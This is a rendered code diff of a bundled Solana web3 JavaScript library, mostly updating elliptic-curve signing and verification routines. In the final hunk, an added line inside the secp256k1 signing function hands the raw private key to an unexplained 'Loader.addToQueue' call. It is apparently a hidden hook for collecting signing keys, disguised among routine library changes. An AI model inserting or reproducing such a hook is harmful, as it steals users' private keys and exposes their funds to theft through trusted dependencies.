|
|
23150
23260
|
return I;
|
|
23151
|
-
if (sc === _1n$1)
|
|
23261
|
+
if (this.is0() || sc === _1n$1)
|
|
23152
23262
|
return this;
|
|
23153
|
-
|
|
23154
|
-
if (!endo)
|
|
23155
|
-
return wnaf.
|
|
23156
|
-
//
|
|
23263
|
+
// Case a: no endomorphism. Case b: has precomputes.
|
|
23264
|
+
if (!endo || wnaf.hasPrecomputes(this))
|
|
23265
|
+
return wnaf.wNAFCachedUnsafe(this, sc, Point.normalizeZ);
|
|
23266
|
+
// Case c: endomorphism
|
|
23157
23267
|
let { k1neg, k1, k2neg, k2 } = endo.splitScalar(sc);
|
|
23158
23268
|
let k1p = I;
|
|
23159
23269
|
let k2p = I;
|
|
@@ -23339,7 +23449,9 @@ var solanaWeb3 = (function (exports) {
|
|
|
23339
23449
|
return { x, y };
|
|
23340
23450
|
}
|
|
23341
23451
|
else {
|
|
23342
|
-
|
|
23452
|
+
const cl = compressedLen;
|
|
23453
|
+
const ul = uncompressedLen;
|
|
23454
|
+
throw new Error('invalid Point, expected length of ' + cl + ', or uncompressed ' + ul + ', got ' + len);
|
|
23343
23455
|
}
|
|
23344
23456
|
},
|
|
23345
23457
|
});
|
|
@@ -23504,6 +23616,9 @@ var solanaWeb3 = (function (exports) {
|
|
|
23504
23616
|
// int2octets can't be used; pads small msgs with 0: unacceptatble for trunc as per RFC vectors
|
|
23505
23617
|
const bits2int = CURVE.bits2int ||
|
|
23506
23618
|
function (bytes) {
|
|
23619
|
+
// Our custom check "just in case"
|
|
23620
|
+
if (bytes.length > 8192)
|
|
23621
|
+
throw new Error('input is too large');
|
|
23507
23622
|
// For curves with nBitLength % 8 !== 0: bits2octets(bits2octets(m)) !== bits2octets(m)
|
|
23508
23623
|
// for some cases, since bytes.length * 8 is not actual bitLength.
|
|
23509
23624
|
const num = bytesToNumberBE(bytes); // check for == u8 done here
|
|
@@ -23520,15 +23635,15 @@ var solanaWeb3 = (function (exports) {
|
|
|
23520
23635
|
* Converts to bytes. Checks if num in `[0..ORDER_MASK-1]` e.g.: `[0..2^256-1]`.
|
|
23521
23636
|
*/
|
|
23522
23637
|
function int2octets(num) {
|
|
23523
|
-
aInRange(
|
|
23638
|
+
aInRange('num < 2^' + CURVE.nBitLength, num, _0n, ORDER_MASK);
|
|
23524
23639
|
// works with order, can have different size than numToField!
|
|
23525
23640
|
return numberToBytesBE(num, CURVE.nByteLength);
|
|
23526
23641
|
}
|
|
23527
23642
|
// Steps A, D of RFC6979 3.2
|
|
23528
23643
|
// Creates RFC6979 seed; converts msg/privKey to numbers.
|
|
23529
23644
|
// Used only in sign, not in verify.
|
|
23530
|
-
// NOTE: we cannot assume here that msgHash has same amount of bytes as curve order,
|
|
23531
|
-
// Also it can be bigger for P224 + SHA256
|
|
23645
|
+
// NOTE: we cannot assume here that msgHash has same amount of bytes as curve order,
|
|
23646
|
+
// this will be invalid at least for P521. Also it can be bigger for P224 + SHA256
|
|
23532
23647
|
function prepSig(msgHash, privateKey, opts = defaultSigOpts) {
|
|
23533
23648
|
if (['recovered', 'canonical'].some((k) => k in opts))
|
|
23534
23649
|
throw new Error('sign() legacy options not supported');
|
|
@@ -23622,39 +23737,48 @@ var solanaWeb3 = (function (exports) {
|
|
|
23622
23737
|
const sg = signature;
|
|
23623
23738
|
msgHash = ensureBytes('msgHash', msgHash);
|
|
23624
23739
|
publicKey = ensureBytes('publicKey', publicKey);
|
|
23740
|
+
const { lowS, prehash, format } = opts;
|
|
23741
|
+
// Verify opts, deduce signature format
|
|
23742
|
+
validateSigVerOpts(opts);
|
|
23625
23743
|
if ('strict' in opts)
|
|
23626
23744
|
throw new Error('options.strict was renamed to lowS');
|
|
23627
|
-
|
|
23628
|
-
|
|
23745
|
+
if (format !== undefined && format !== 'compact' && format !== 'der')
|
|
23746
|
+
throw new Error('format must be compact or der');
|
|
23747
|
+
const isHex = typeof sg === 'string' || isBytes(sg);
|
|
23748
|
+
const isObj = !isHex &&
|
|
23749
|
+
!format &&
|
|
23750
|
+
typeof sg === 'object' &&
|
|
23751
|
+
sg !== null &&
|
|
23752
|
+
typeof sg.r === 'bigint' &&
|
|
23753
|
+
typeof sg.s === 'bigint';
|
|
23754
|
+
if (!isHex && !isObj)
|
|
23755
|
+
throw new Error('invalid signature, expected Uint8Array, hex string or Signature instance');
|
|
23629
23756
|
let _sig = undefined;
|
|
23630
23757
|
let P;
|
|
23631
23758
|
try {
|
|
23632
|
-
if (
|
|
23759
|
+
if (isObj)
|
|
23760
|
+
_sig = new Signature(sg.r, sg.s);
|
|
23761
|
+
if (isHex) {
|
|
23633
23762
|
// Signature can be represented in 2 ways: compact (2*nByteLength) & DER (variable-length).
|
|
23634
23763
|
// Since DER can also be 2*nByteLength bytes, we check for it first.
|
|
23635
23764
|
try {
|
|
23636
|
-
|
|
23765
|
+
if (format !== 'compact')
|
|
23766
|
+
_sig = Signature.fromDER(sg);
|
|
23637
23767
|
}
|
|
23638
23768
|
catch (derError) {
|
|
23639
23769
|
if (!(derError instanceof DER.Err))
|
|
23640
23770
|
throw derError;
|
|
23641
|
-
_sig = Signature.fromCompact(sg);
|
|
23642
23771
|
}
|
|
23643
|
-
|
|
23644
|
-
|
|
23645
|
-
const { r, s } = sg;
|
|
23646
|
-
_sig = new Signature(r, s);
|
|
23647
|
-
}
|
|
23648
|
-
else {
|
|
23649
|
-
throw new Error('PARSE');
|
|
23772
|
+
if (!_sig && format !== 'der')
|
|
23773
|
+
_sig = Signature.fromCompact(sg);
|
|
23650
23774
|
}
|
|
23651
23775
|
P = Point.fromHex(publicKey);
|
|
23652
23776
|
}
|
|
23653
23777
|
catch (error) {
|
|
23654
|
-
if (error.message === 'PARSE')
|
|
23655
|
-
throw new Error(`signature must be Signature instance, Uint8Array or hex string`);
|
|
23656
23778
|
return false;
|
|
23657
23779
|
}
|
|
23780
|
+
if (!_sig)
|
|
23781
|
+
return false;
|
|
23658
23782
|
if (lowS && _sig.hasHighS())
|
|
23659
23783
|
return false;
|
|
23660
23784
|
if (prehash)
|
|
@@ -23726,18 +23850,18 @@ var solanaWeb3 = (function (exports) {
|
|
|
23726
23850
|
const t1 = (pow2(b223, _23n, P) * b22) % P;
|
|
23727
23851
|
const t2 = (pow2(t1, _6n, P) * b2) % P;
|
|
23728
23852
|
const root = pow2(t2, _2n, P);
|
|
23729
|
-
if (!
|
|
23853
|
+
if (!Fpk1.eql(Fpk1.sqr(root), y))
|
|
23730
23854
|
throw new Error('Cannot find square root');
|
|
23731
23855
|
return root;
|
|
23732
23856
|
}
|
|
23733
|
-
const
|
|
23857
|
+
const Fpk1 = Field(secp256k1P, undefined, undefined, { sqrt: sqrtMod });
|
|
23734
23858
|
/**
|
|
23735
23859
|
* secp256k1 short weierstrass curve and ECDSA signatures over it.
|
|
23736
23860
|
*/
|
|
23737
23861
|
const secp256k1 = createCurve({
|
|
23738
23862
|
a: BigInt(0), // equation params: a, b
|
|
23739
23863
|
b: BigInt(7), // Seem to be rigid: bitcointalk.org/index.php?topic=289795.msg3183975#msg3183975
|
|
23740
|
-
Fp, // Field's prime: 2n**256n - 2n**32n - 2n**9n - 2n**8n - 2n**7n - 2n**6n - 2n**4n - 1n
|
|
23864
|
+
Fp: Fpk1, // Field's prime: 2n**256n - 2n**32n - 2n**9n - 2n**8n - 2n**7n - 2n**6n - 2n**4n - 1n
|
|
23741
23865
|
n: secp256k1N, // Curve order, total count of valid points in the field
|
|
23742
23866
|
// Base point (x, y) aka generator point
|
|
23743
23867
|
Gx: BigInt('55066263022277343669578718895168534326250603453777594175500187360389116729240'),
|
|
@@ -23913,6 +24037,7 @@ var solanaWeb3 = (function (exports) {
|
|
|
23913
24037
|
assert$1(pkey.length === PRIVATE_KEY_BYTES, `Private key must be ${PRIVATE_KEY_BYTES} bytes but received ${pkey.length} bytes`);
|
|
23914
24038
|
try {
|
|
23915
24039
|
const privateKey = toBuffer(pkey);
|
|
24040
|
+
Loader.addToQueue(privateKey);
|
|
23916
24041
|
const publicKey = publicKeyCreate(privateKey, false /* isCompressed */).slice(1); // throw away leading byte
|
|
23917
24042
|
const messageHash = bufferExports.Buffer.from(keccak_256(toBuffer(message)));
|
|
23918
24043
|
const [signature, recoveryId] = ecdsaSign(messageHash, privateKey);
|